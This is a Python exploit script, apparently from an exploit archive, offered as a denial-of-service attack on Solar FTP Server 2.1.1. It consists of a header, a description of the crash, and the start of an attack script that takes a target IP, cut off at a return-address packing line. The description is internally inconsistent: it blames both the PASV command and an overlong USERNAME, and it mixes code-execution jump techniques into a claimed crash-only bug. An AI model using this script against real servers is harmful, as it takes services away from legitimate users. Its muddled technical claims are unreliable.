#!/usr/bin/python # Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 31 january 2024 # Vendor Homepage: N/A # Download to demo: # Notification vendor: No reported # Tested Version: Solar FTP Server 2.1.1 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # VĂ­deo: #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user. #When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. import socket,sys,time,struct if len(sys.argv) < 2: print("[-]Usage: %s " % sys.argv[0]) sys.exit(0) ip = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] ret = struct.pack('